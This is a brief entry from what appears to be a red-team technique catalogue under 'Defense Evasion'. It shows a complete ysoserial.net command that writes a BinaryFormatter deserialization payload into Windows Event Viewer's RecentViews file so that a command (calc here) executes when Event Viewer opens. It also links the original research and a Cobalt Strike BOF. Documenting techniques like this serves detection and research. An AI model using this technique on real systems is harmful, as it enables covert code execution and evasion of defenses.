Secondary Categories: 02-Defense Evasion
Description:
This technique will execute a command that is specified from the ysoserial compiler to execute on Windows Event Viewer
https://github.com/pwntester/ysoserial.net
ysoserial.exe -o raw -f BinaryFormatter -g Dataset -c calc > "C:\Users\Research\AppData\Local\Microsoft\Event Viewer\RecentViews"
Resources:
Title | URL |
---|---|
Original Security Researcher finding | https://twitter.com/orange_8361/status/1518970259868626944 |
ysoserial repo with exe | https://github.com/pwntester/ysoserial.net |
Cobalt Strike BOF | https://twitter.com/ntlmrelay/status/1521821603746750465?s=09 |